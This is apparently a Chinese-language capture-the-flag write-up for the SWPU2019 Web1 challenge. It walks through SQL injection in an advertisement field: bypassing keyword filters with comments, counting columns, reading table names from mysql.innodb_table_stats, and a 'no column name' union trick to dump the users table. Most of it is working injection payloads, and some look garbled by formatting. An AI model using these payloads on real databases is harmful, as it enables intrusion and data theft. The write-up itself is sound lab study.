| title | author | avatar | authorAbout | authorDesc | categories | comments | date | authorLink | tags | keywords | description | photos |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
[SWPU2019]Web1 |
Troy3e |
steamID:888007034 |
Blizzard:TroyeSivan#51769 |
技术 |
true |
2020-07-20 14:18:07 -0700 |
无列名注入 |
广告版处存在注入,
先fuzz测试一波:
过滤的东西不多。 接下来先爆列数 order被过滤,还可以用group by 1'//group//by/**/22,'1
一共有二十二列。。。
or被过滤,information_schema不能使用,这里要用到无列名注入。
-1'//union//select//1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
回显位是2,3.
查数据库
-1'union//select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
发现是马里奥数据库
百度搜到了这个可以利用的:
查表 -1'union//select//1,(select//group_concat(table_name)//from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
无列名注入
设第二列别名为b -1'//union//select//1,(select//group_concat(b)//from//(select//1,2//as//b,3//union//select//*//from//users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
设第三列别名为b -1'//union//select//1,(select//group_concat(b)//from//(select//1,2,3//as//b//union//select//*//from//users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
